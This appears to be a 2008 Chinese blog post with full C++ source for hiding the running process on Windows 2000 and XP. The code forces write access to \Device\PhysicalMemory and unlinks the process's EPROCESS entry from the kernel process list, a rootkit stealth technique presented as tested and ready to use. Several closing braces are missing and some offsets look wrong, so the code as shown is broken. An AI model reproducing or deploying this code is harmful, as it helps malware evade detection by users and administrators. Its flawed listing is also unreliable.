《在2000和XP下隐藏进程》代码

网上流传的《在2000和XP下隐藏进程》这篇文章，我想找原始出处却没有一篇有注明的，想必文章发表时没有附带出处，失传了吧。我整理了一下这篇文章里的代码，在VC2008下调试通过，在XP SP2下测试可用，确实隐藏掉自身进程了。程序是通过修改物理内存，似乎是摘除自身在系统中的信息，来实现隐藏的。兼容性也就比较差了，只能在2000和XP下有效，如果有朋友研究到2003及以后版本系统的方案，希望可以公开交流交流。

#include "stdafx.h"

#include <windows.h>

#include <tchar.h>

#include <Aclapi.h>

#define dprintf _tprintf

// A process has requested access to an object, but has not been granted those access rights.

#define STATUS_ACCESS_DENIED ((NTSTATUS)0xC0000022L)

#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)

typedef struct _UNICODE_STRING

{

USHORT Length;

USHORT MaximumLength;

#ifdef MIDL_PASS

[size_is(MaximumLength / 2), length_is((Length) / 2) ] USHORT * Buffer;

#else // MIDL_PASS

PWSTR Buffer;

#endif // MIDL_PASS

} UNICODE_STRING, *PUNICODE_STRING;

typedef struct _OBJECT_ATTRIBUTES

{

ULONG Length;

HANDLE RootDirectory;

PUNICODE_STRING ObjectName;

ULONG Attributes;

PVOID SecurityDescriptor; // Points to type SECURITY_DESCRIPTOR

PVOID SecurityQualityOfService; // Points to type SECURITY_QUALITY_OF_SERVICE

} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;

typedef NTSTATUS (NTAPI *NTOPENSECTION)(

OUT PHANDLE SectionHandle,

IN ACCESS_MASK DesiredAccess,

IN POBJECT_ATTRIBUTES ObjectAttributes

);

typedef VOID (NTAPI *RTLINITUNICODESTRING)(

IN OUT PUNICODE_STRING DestinationString,

IN PCWSTR SourceString

);

bool InitNTDLL();

void CloseNTDLL();

bool SetPhyscialMemorySectionCanBeWrited(HANDLE hSection);

HANDLE OpenPhysicalMemory();

void ClosePhysicalMemory();

PVOID LinearToPhys(PULONG BaseAddress, PVOID addr);

ULONG GetData(PVOID addr);

bool SetData(PVOID addr, ULONG data);

bool HideCurrentProcess();

BOOL EnablePrivilege(LPCTSTR pPrivName, BOOL bEnable = TRUE);

HMODULE g_hNtDLL = NULL;

NTOPENSECTION NtOpenSection = NULL;

RTLINITUNICODESTRING RtlInitUnicodeString = NULL;

OSVERSIONINFO g_osvi = {0};

HANDLE g_hMPM = NULL;

PVOID g_pMapPhysicalMemory = NULL;

void _tmain(int argc, _TCHAR* argv[])

{

_tsetlocale(0, _T("chs"));

_tprintf(_T("隐藏当前进程%s\n"),

HideCurrentProcess() ? _T("成功") : _T("失败"));

_tprintf(_T("\n请按任意键退出. . ."));

_getwch();

}

bool InitNTDLL()

{

g_hNtDLL = LoadLibrary(_T("ntdll.dll"));

if (g_hNtDLL == NULL)

return false;

NtOpenSection = (NTOPENSECTION)GetProcAddress(g_hNtDLL, "NtOpenSection");

RtlInitUnicodeString = (RTLINITUNICODESTRING)GetProcAddress(g_hNtDLL, "RtlInitUnicodeString");

return (NtOpenSection != NULL && RtlInitUnicodeString != NULL);

}

void CloseNTDLL()

{

if (g_hNtDLL != NULL)

{

FreeLibrary(g_hNtDLL);

g_hNtDLL = NULL;

}

bool SetPhyscialMemorySectionCanBeWrited(HANDLE hSection)

{

PACL pDacl = NULL;

PACL pNewDacl = NULL;

PSECURITY_DESCRIPTOR pSD = NULL;

DWORD dwResult = ERROR_SUCCESS;

EXPLICIT_ACCESS ea;

dwResult = GetSecurityInfo(

hSection,

SE_KERNEL_OBJECT,

DACL_SECURITY_INFORMATION,

NULL,

&pDacl,

NULL,

&pSD);

if (dwResult != ERROR_SUCCESS)

{

dprintf(_T("GetSecurityInfo Error=%lu\n"), dwResult);

goto __End;

}

ZeroMemory(&ea, sizeof(EXPLICIT_ACCESS));

ea.grfAccessPermissions = SECTION_MAP_WRITE;

ea.grfAccessMode = GRANT_ACCESS;

ea.grfInheritance= NO_INHERITANCE;

ea.Trustee.TrusteeForm = TRUSTEE_IS_NAME;

ea.Trustee.TrusteeType = TRUSTEE_IS_USER;

ea.Trustee.ptstrName = _T("CURRENT_USER");

dwResult = SetEntriesInAcl(1, &ea, pDacl, &pNewDacl);

if (dwResult != ERROR_SUCCESS)

{

dprintf(_T("SetEntriesInAcl Error=%lu\n"), dwResult);

goto __End;

}

dwResult = SetSecurityInfo(

hSection,

SE_KERNEL_OBJECT,

DACL_SECURITY_INFORMATION,

NULL,

pNewDacl,

NULL);

if (dwResult != ERROR_SUCCESS)

{

dprintf(_T("SetSecurityInfo Error=%lu\n"), dwResult);

goto __End;

}

__End:

if (pDacl != NULL)

LocalFree(pDacl);

if (pNewDacl != NULL)

LocalFree(pNewDacl);

if (pSD != NULL)

LocalFree(pSD);

return (dwResult == ERROR_SUCCESS);

}

HANDLE OpenPhysicalMemory()

{

HANDLE hResult = NULL;

NTSTATUS status = -1;

UNICODE_STRING physmemString;

OBJECT_ATTRIBUTES attributes;

ULONG PhyDirectory = 0;

g_osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);

GetVersionEx(&g_osvi);

if (g_osvi.dwMajorVersion == 5)

{

switch (g_osvi.dwMinorVersion)

{

case 0: // 2000

PhyDirectory = 0x30000;

break;

case 1: // XP

case 2: // 2003

PhyDirectory = 0x39000;

break;

}

else if (g_osvi.dwMajorVersion == 4 && g_osvi.dwMinorVersion == 0 && g_osvi.dwPlatformId == 2) // NT

{

PhyDirectory = 0x30000;

}

if (PhyDirectory == 0)

{

dprintf(_T("不支持当前操作系统, 版本: %lu.%lu.%lu\n"),

g_osvi.dwMajorVersion,

g_osvi.dwMinorVersion,

g_osvi.dwBuildNumber);

goto __End;

}

RtlInitUnicodeString(&physmemString, L"\\Device\\PhysicalMemory");

attributes.Length = sizeof(OBJECT_ATTRIBUTES);

attributes.RootDirectory = NULL;

attributes.ObjectName = &physmemString;

attributes.Attributes = 0;

attributes.SecurityDescriptor = NULL;

attributes.SecurityQualityOfService = NULL;

status = NtOpenSection(&g_hMPM, SECTION_MAP_READ | SECTION_MAP_WRITE, &attributes);

if(status == STATUS_ACCESS_DENIED)

{

dprintf(_T("NtOpenSection access denied\n"));

status = NtOpenSection(&g_hMPM, READ_CONTROL | WRITE_DAC, &attributes);

if (NT_SUCCESS(status))

{

SetPhyscialMemorySectionCanBeWrited(g_hMPM);

CloseHandle(g_hMPM);

status = NtOpenSection(&g_hMPM, SECTION_MAP_READ | SECTION_MAP_WRITE, &attributes);

}

if (!NT_SUCCESS(status))

{

dprintf(_T("NtOpenSection Error=0x%X\n"), (DWORD)status);

goto __End;

}

g_pMapPhysicalMemory = MapViewOfFile(g_hMPM, FILE_MAP_READ | FILE_MAP_WRITE, 0, PhyDirectory, 0x1000);

if (g_pMapPhysicalMemory == NULL)

{

dprintf(_T("MapViewOfFile Error=%lu\n"), GetLastError());

goto __End;

}

hResult = g_hMPM;

__End:

return hResult;

}

void ClosePhysicalMemory()

{

if (g_pMapPhysicalMemory != NULL)

{

UnmapViewOfFile(g_pMapPhysicalMemory);

g_pMapPhysicalMemory = NULL;

}

if (g_hMPM != NULL)

{

CloseHandle(g_hMPM);

g_hMPM = NULL;

}

PVOID LinearToPhys(PULONG BaseAddress, PVOID addr)

{

ULONG VAddr = (ULONG)addr;

ULONG PGDE = BaseAddress[VAddr >> 22];

ULONG PTE = 0;

ULONG PAddr = 0;

ULONG tmp = PGDE & 0x00000080;

if ((PGDE & 1) == 0)

return NULL;

if (tmp != 0)

{

PAddr = (PGDE & 0xFFC00000) + (VAddr & 0x003FFFFF);

}

else

{

PGDE = (ULONG)MapViewOfFile(g_hMPM, FILE_MAP_READ, 0, PGDE & 0xFFFFF000, 0x1000);

if (!PGDE)

return NULL;

PTE = ((PULONG)PGDE)[(VAddr & 0x003FF000) >> 12];

if ((PTE & 1) == 0)

{

UnmapViewOfFile((PVOID)PGDE);

return NULL;

}

PAddr = (PTE & 0xFFFFF000) + (VAddr & 0x00000FFF);

UnmapViewOfFile((PVOID)PGDE);

}

return (PVOID)PAddr;

}

ULONG GetData(PVOID addr)

{

ULONG ret = 0;

ULONG phys = 0;

PULONG tmp = 0;

phys = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, addr);

if (!phys)

{

_tprintf(_T("GetData LinearToPhys return 0\n"));

return ret;

}

tmp = (PULONG)MapViewOfFile(g_hMPM, FILE_MAP_READ | FILE_MAP_WRITE, 0, phys & 0xFFFFF000, 0x1000);

if (tmp != NULL)

{

ret = tmp[(phys & 0xFFF) >> 2];

UnmapViewOfFile(tmp);

}

else

{

_tprintf(_T("GetData MapViewOfFile return NULL\n"));

}

return ret;

}

bool SetData(PVOID addr, ULONG data)

{

ULONG phys = 0;

PULONG tmp = 0;

phys = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, addr);

if (!phys)

{

_tprintf(_T("SetData LinearToPhys return 0\n"));

return false;

}

tmp = (PULONG)MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0, phys & 0xFFFFF000, 0x1000);

if (tmp == NULL)

{

_tprintf(_T("SetData MapViewOfFile return NULL\n"));

return false;

}

tmp[(phys & 0xFFF) >> 2] = data;

UnmapViewOfFile(tmp);

return true;

}

bool HideCurrentProcess()

{

ULONG fw = 0;

ULONG bw = 0;

ULONG thread = 0;

ULONG process = 0;

static bool bHidden = false;

if (bHidden)

return bHidden;

EnablePrivilege(SE_SECURITY_NAME);

if (!InitNTDLL() || OpenPhysicalMemory() == NULL)

goto __End;

thread = GetData((PVOID)0xFFDFF124); // Read the ETHREAD struct

if (!thread)

{

_tprintf(_T("thread=0\n"));

goto __End;

}

process = GetData((PVOID)(thread + 0x44)); // Read the EPROCESS struct

if (!process)

{

_tprintf(_T("process=0\n"));

goto __End;

}

if (g_osvi.dwMajorVersion == 5)

{

switch (g_osvi.dwMinorVersion)

{

case 0: // 2000

fw = GetData((PVOID)(process + 0xA0));

bw = GetData((PVOID)(process + 0xA4));

break;

case 1: // XP

fw = GetData((PVOID)(process + 0x88));

bw = GetData((PVOID)(process + 0x8C));

break;

case 2: // 2003

fw = GetData((PVOID)(process + 0x8A));

bw = GetData((PVOID)(process + 0x8E));

break;

}

else if (g_osvi.dwMajorVersion == 4 && g_osvi.dwMinorVersion == 0 && g_osvi.dwPlatformId == 2) // NT

{

fw = GetData((PVOID)(process + 0x98));

bw = GetData((PVOID)(process + 0x9C));

}

if (fw && bw)

bHidden = (SetData((PVOID)(fw + 4), bw) && SetData((PVOID)bw, fw));

else

_tprintf(_T("fw=%lu, bw=%lu\n"), fw, bw);

__End:

CloseNTDLL();

ClosePhysicalMemory();

EnablePrivilege(SE_SECURITY_NAME, FALSE);

return bHidden;

}

BOOL EnablePrivilege(LPCTSTR pPrivName, BOOL bEnable)

{

BOOL bReturn = FALSE;

HANDLE hToken = NULL;

LUID uidName = {0};

TOKEN_PRIVILEGES tpToken = {0};

DWORD dwReturn = 0;

if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))

return bReturn;

if (!LookupPrivilegeValue(NULL, pPrivName, &uidName))

{

CloseHandle(hToken);

return bReturn;

}

tpToken.PrivilegeCount = 1;

tpToken.Privileges[0].Luid = uidName;

tpToken.Privileges[0].Attributes = bEnable ? SE_PRIVILEGE_ENABLED : SE_PRIVILEGE_REMOVED;

bReturn = AdjustTokenPrivileges(hToken, FALSE, &tpToken, sizeof(TOKEN_PRIVILEGES), NULL, &dwReturn);

CloseHandle(hToken);

return bReturn;

}

posted on 2008-06-06 16:15 秋忆阅读(1888) 评论(0) 编辑收藏举报